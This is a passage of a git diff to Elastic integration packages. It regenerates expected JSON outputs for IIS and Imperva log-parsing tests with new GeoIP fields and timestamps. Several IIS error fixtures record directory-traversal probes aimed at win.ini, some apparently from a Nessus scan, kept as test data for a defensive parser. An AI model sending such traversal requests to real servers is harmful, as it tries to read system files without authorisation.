- 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23", "kind": "event", "category": [ @@ -271,7 +271,7 @@ }, "event": { "duration": 32000000, - "ingested": "2021-12-09T13:39:36.546192Z", + "ingested": "2021-12-14T14:46:49.526782875Z", "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ @@ -346,7 +346,7 @@ }, "event": { "duration": 166000000, - "ingested": "2021-12-09T13:39:36.546201100Z", + "ingested": "2021-12-14T14:46:49.526783256Z", "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23", "kind": "event", "category": [ @@ -420,7 +420,7 @@ }, "event": { "duration": 60000000, - "ingested": "2021-12-09T13:39:36.546217700Z", + "ingested": "2021-12-14T14:46:49.526783625Z", "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23", "kind": "event", "category": [ @@ -494,7 +494,7 @@ }, "event": { "duration": 72000000, - "ingested": "2021-12-09T13:39:36.546240Z", + "ingested": "2021-12-14T14:46:49.526784018Z", "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23", "kind": "event", "category": [ @@ -568,7 +568,7 @@ }, "event": { "duration": 88000000, - "ingested": "2021-12-09T13:39:36.546248800Z", + "ingested": "2021-12-14T14:46:49.526784412Z", "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23", "kind": "event", "category": [ @@ -642,7 +642,7 @@ }, "event": { "duration": 286000000, - "ingested": "2021-12-09T13:39:36.546255Z", + "ingested": "2021-12-14T14:46:49.526784786Z", "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json index 567c09487cc..742c9994e92 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json @@ -1,24 +1,6 @@ { "expected": [ { - "destination": { - "port": 80, - "address": "172.31.77.6", - "ip": "172.31.77.6" - }, - "source": { - "port": 2094, - "address": "172.31.77.6", - "ip": "172.31.77.6" - }, - "url": { - "path": "/qos/1kbfile.txt", - "extension": "txt", - "original": "/qos/1kbfile.txt" - }, - "tags": [ - "preserve_original_event" - ], "iis": { "error": { "reason_phrase": "ConnLimit" @@ -34,6 +16,11 @@ "172.31.77.6" ] }, + "destination": { + "port": 80, + "address": "172.31.77.6", + "ip": "172.31.77.6" + }, "http": { "request": { "method": "GET" @@ -43,8 +30,13 @@ "status_code": 503 } }, + "source": { + "port": 2094, + "address": "172.31.77.6", + "ip": "172.31.77.6" + }, "event": { - "ingested": "2021-12-09T13:39:38.169719300Z", + "ingested": "2021-12-14T14:46:51.146852766Z", "original": "2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -", "category": [ "web", @@ -55,27 +47,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 80, - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "source": { - "port": 2780, - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "url": { - "path": "/ThisIsMyUrl.htm", - "extension": "htm", - "original": "/ThisIsMyUrl.htm" + "path": "/qos/1kbfile.txt", + "extension": "txt", + "original": "/qos/1kbfile.txt" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Hostname" @@ -91,6 +73,11 @@ "127.0.0.1" ] }, + "destination": { + "port": 80, + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "http": { "request": { "method": "GET" @@ -100,8 +87,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 2780, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:38.169724100Z", + "ingested": "2021-12-14T14:46:51.146855078Z", "original": "2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -", "category": [ "web", @@ -112,26 +116,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 80, - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "source": { - "port": 2894, - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "url": { - "path": "/", - "original": "/" + "path": "/ThisIsMyUrl.htm", + "extension": "htm", + "original": "/ThisIsMyUrl.htm" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Version_N/S" @@ -147,6 +142,11 @@ "127.0.0.1" ] }, + "destination": { + "port": 80, + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "http": { "request": { "method": "GET" @@ -156,8 +156,25 @@ "status_code": 505 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 2894, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:38.169727800Z", + "ingested": "2021-12-14T14:46:51.146855565Z", "original": "2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", "category": [ "web", @@ -168,7 +185,14 @@ ], "kind": "event", "outcome": "failure" - } + }, + "url": { + "path": "/", + "original": "/" + }, + "tags": [ + "preserve_original_event" + ] }, { "iis": { @@ -192,12 +216,24 @@ "ip": "127.0.0.1" }, "source": { - "port": 64388, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 64388, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:38.169731300Z", + "ingested": "2021-12-14T14:46:51.146855982Z", "original": "2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", "category": [ "web", diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json index 8d04eec0d0a..c0fc6cecd03 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json @@ -1,24 +1,6 @@ { "expected": [ { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" - }, - "url": { - "path": "12.2.1", - "extension": "1", - "original": "12.2.1" - }, - "tags": [ - "preserve_original_event" - ], "iis": { "error": { "reason_phrase": "URL" @@ -34,6 +16,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "t3" @@ -43,8 +30,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462543700Z", + "ingested": "2021-12-14T14:46:51.522819409Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", "category": [ "web", @@ -55,27 +59,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "./././././../../../../../../../../", - "extension": "/", - "original": "./././././../../../../../../../../" + "path": "12.2.1", + "extension": "1", + "original": "12.2.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -91,6 +85,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -100,8 +99,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462553Z", + "ingested": "2021-12-14T14:46:51.522822131Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", "category": [ "web", @@ -112,25 +128,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "/..\\pixfir~1\\how_to_login.html" + "path": "./././././../../../../../../../../", + "extension": "/", + "original": "./././././../../../../../../../../" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Forbidden" @@ -146,6 +154,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -155,8 +168,25 @@ "status_code": 403 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462558900Z", + "ingested": "2021-12-14T14:46:51.522822594Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", "category": [ "web", @@ -167,25 +197,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" + "original": "/..\\pixfir~1\\how_to_login.html" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -201,6 +221,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -210,8 +235,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462564400Z", + "ingested": "2021-12-14T14:46:51.522822966Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", "category": [ "web", @@ -222,27 +264,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", - "extension": "ini", - "original": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini" + "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "NotFound" @@ -258,6 +288,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -267,8 +302,25 @@ "status_code": 404 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462569800Z", + "ingested": "2021-12-14T14:46:51.522823320Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", "category": [ "web", @@ -279,25 +331,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" + "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", + "extension": "ini", + "original": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Forbidden" @@ -313,6 +357,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -322,8 +371,25 @@ "status_code": 403 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462575200Z", + "ingested": "2021-12-14T14:46:51.522823679Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", "category": [ "web", @@ -334,26 +400,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "*", - "original": "*" + "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "NotFound" @@ -369,6 +424,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "OPTIONS" @@ -378,8 +438,25 @@ "status_code": 404 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462580600Z", + "ingested": "2021-12-14T14:46:51.522824037Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", "category": [ "web", @@ -390,26 +467,16 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "/fee\u0026fie=foe", - "original": "/fee\u0026fie=foe" + "path": "*", + "original": "*" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -425,6 +492,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -434,8 +506,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462586Z", + "ingested": "2021-12-14T14:46:51.522824411Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", "category": [ "web", @@ -446,7 +535,14 @@ ], "kind": "event", "outcome": "failure" - } + }, + "url": { + "path": "/fee\u0026fie=foe", + "original": "/fee\u0026fie=foe" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json index 5b5975e1200..657967a2e13 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json @@ -27,7 +27,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:39:39.018996800Z", + "ingested": "2021-12-14T14:46:52.366866064Z", "original": "2018-12-30 14:22:07 ::1%0 49958 ::1%0 80 - - - - - - Timer_ConnectionIdle -", "category": [ "web", diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index 4f39fce9252..da2acc24d2e 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml @@ -1,6 +1,6 @@ name: iis title: IIS -version: 0.8.1 +version: 0.8.2 description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent. type: integration icons: diff --git a/packages/imperva/changelog.yml b/packages/imperva/changelog.yml index 8d241265c82..701e0056094 100644 --- a/packages/imperva/changelog.yml +++ b/packages/imperva/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json b/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json index f418b266b5e..52b3b82b637 100644 --- a/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.70.155.35,dstPort=892,dbUsername=tatno,srcIP=10.81.122.126,srcPort=4141,creatTime=29 January 2016 06:09:59,srvGroup=uam,service=untutl,appName=rad,event#=taliqu,eventType=Login,usrGroup=ommod,usrAuth=True,application=\"scivel\",osUsername=aqui,srcHost=radipis5408.mail.local,dbName=enatuse,schemaName=magn,bindVar=equuntu,sqlError=failure,respSize=5910,respTime=10.347000,affRows=sum,action=\"cancel\",rawQuery=\"sit\"", "event": { - "ingested": "2021-06-09T11:17:04.825696700Z" + "ingested": "2021-12-14T14:46:55.618542860Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=nimadmin,createTime=2016-02-12 13:12:33,eventType=erep,eventSev=low,username=temq,subsystem=ugiatqu,message=\"eacomm\"", "event": { - "ingested": "2021-06-09T11:17:04.825722Z" + "ingested": "2021-12-14T14:46:55.618545762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.58.116.231,dstPort=996,dbUsername=qua,srcIP=10.159.182.171,srcPort=3947,creatTime=2016-02-26 20:15:08,srvGroup=apariat,service=mol,appName=pteursi,event#=onse,eventType=rumet,usrGroup=oll,usrAuth=erc,application=\"taliqu\",osUsername=temUten,srcHost=ccusan7572.api.home,dbName=aveniam,schemaName=uradi,bindVar=nimadmin,sqlError=failure,respSize=3626,respTime=79.328000,affRows=ender,action=\"accept\",rawQuery=\"ehenderi\"", "event": { - "ingested": "2021-06-09T11:17:04.825729900Z" + "ingested": "2021-12-14T14:46:55.618546199Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.232.27.250,dstPort=7838,dbUsername=mquidol,srcIP=10.18.124.28,srcPort=7668,creatTime=12 March 2016 03:17:42,srvGroup=rsitamet,service=lupt,appName=xea,event#=qua,eventType=Login,usrGroup=luptatev,usrAuth=False,application=\"admi\",osUsername=modocons,srcHost=elaudant5931.internal.invalid,dbName=lores,schemaName=lapariat,bindVar=eddoei,sqlError=failure,respSize=6564,respTime=87.496000,affRows=nimadmin,action=\"cancel\",rawQuery=\"xercitat\"", "event": { - "ingested": "2021-06-09T11:17:04.825735500Z" + "ingested": "2021-12-14T14:46:55.618546636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ationemu,event#=ice,createTime=2016-03-26 10:20:16,updateTime=estiae,alertSev=high,group=laborum,ruleName=\"tionof\",evntDesc=\"snostrud\",category=nama,disposition=quisnos,eventType=ite,proto=icmp,srcPort=2707,srcIP=10.6.137.200,dstPort=5697,dstIP=10.197.250.10,policyName=\"bor\",occurrences=7243,httpHost=hitect,webMethod=dol,url=\"https://internal.example.net/namali/taevit.html?nsecte=itame#eumfug\",webQuery=\"lit\",soapAction=asun,resultCode=estia,sessionID=eaq,username=occae,addUsername=ctetura,responseTime=labore,responseSize=texp,direction=external,dbUsername=adeseru,queryGroup=emoe,application=\"eaq\",srcHost=amest4147.mail.host,osUsername=intoc,schemaName=oluptas,dbName=tNequepo,hdrName=lup,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.825765500Z" + "ingested": "2021-12-14T14:46:55.618547038Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=sperna,event#=eabilloi,createTime=2016-04-09 17:22:51,updateTime=estia,alertSev=medium,group=tlab,ruleName=\"volupt\",evntDesc=\"osqui\",category=xerc,disposition=iutali,eventType=fdeFi,proto=igmp,srcPort=1696,srcIP=10.179.124.125,dstPort=5473,dstIP=10.36.194.106,policyName=\"eprehend\",occurrences=2462,httpHost=dutper,webMethod=lamcolab,url=\"https://example.net/tlabo/uames.gif?mpo=offi#giatnu\",webQuery=\"ulapa\",soapAction=liqui,resultCode=quioffi,sessionID=uptate,username=ncidid,addUsername=quaturve,responseTime=sequa,responseSize=aera,direction=outbound,dbUsername=rvel,queryGroup=uid,application=\"onsecte\",srcHost=eratv6205.internal.lan,osUsername=reme,schemaName=acommod,dbName=uaUteni,hdrName=udantium,action=accept", "event": { - "ingested": "2021-06-09T11:17:04.825772100Z" + "ingested": "2021-12-14T14:46:55.618547431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.129.149.43,dstPort=3304,dbUsername=eveli,srcIP=10.211.105.204,srcPort=2742,creatTime=2016-04-24 00:25:25,srvGroup=aliquide,service=ofde,appName=equat,event#=derit,eventType=Logout,usrGroup=dexea,usrAuth=True,application=\"atcu\",osUsername=labor,srcHost=didunt1355.corp,dbName=udan,schemaName=orema,bindVar=invento,sqlError=failure,respSize=6855,respTime=74.098000,affRows=nofdeFin,action=\"accept\",rawQuery=\"rau\"", "event": { - "ingested": "2021-06-09T11:17:04.825777700Z" + "ingested": "2021-12-14T14:46:55.618547896Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.214.191.180,dstPort=5848,dbUsername=ipsumdol,srcIP=10.112.250.193,srcPort=5705,creatTime=2016-05-08 07:27:59,srvGroup=urerepr,service=ese,appName=isaute,event#=ptatemq,eventType=Logout,usrGroup=luptatev,usrAuth=False,application=\"tlabore\",osUsername=Exc,srcHost=pora6854.www5.home,dbName=nevo,schemaName=ide,bindVar=aali,sqlError=success,respSize=6852,respTime=49.573000,affRows=etcons,action=\"cancel\",rawQuery=\"tenbyCi\"", "event": { - "ingested": "2021-06-09T11:17:04.825782800Z" + "ingested": "2021-12-14T14:46:55.618548298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.251.20.13,dstPort=264,dbUsername=iquipe,srcIP=10.192.34.76,srcPort=1450,creatTime=2016-05-22 14:30:33,srvGroup=upida,service=tvolupt,appName=eufugi,event#=pici,eventType=abor,usrGroup=utpe,usrAuth=onsequ,application=\"temqu\",osUsername=ovol,srcHost=ptasn6599.www.localhost,dbName=lore,schemaName=tnonpro,bindVar=ionemu,sqlError=success,respSize=3645,respTime=20.909000,affRows=tanimid,action=\"deny\",rawQuery=\"uamni\"", "event": { - "ingested": "2021-06-09T11:17:04.825788600Z" + "ingested": "2021-12-14T14:46:55.618548693Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.74.105.218,dstPort=2438,dbUsername=archite,srcIP=10.59.138.212,srcPort=7829,creatTime=2016-06-05 21:33:08,srvGroup=asi,service=datatno,appName=siutali,event#=amnih,eventType=Logout,usrGroup=ium,usrAuth=True,application=\"esciuntN\",osUsername=idunt,srcHost=ptasnu6684.mail.lan,dbName=orumSe,schemaName=boree,bindVar=intoc,sqlError=success,respSize=248,respTime=158.450000,affRows=eeufugia,action=\"block\",rawQuery=\"ofdeFini\"", "event": { - "ingested": "2021-06-09T11:17:04.825793500Z" + "ingested": "2021-12-14T14:46:55.618549077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.168.159.13,dstPort=3319,dbUsername=inci,srcIP=10.230.173.4,srcPort=2631,creatTime=2016-06-20 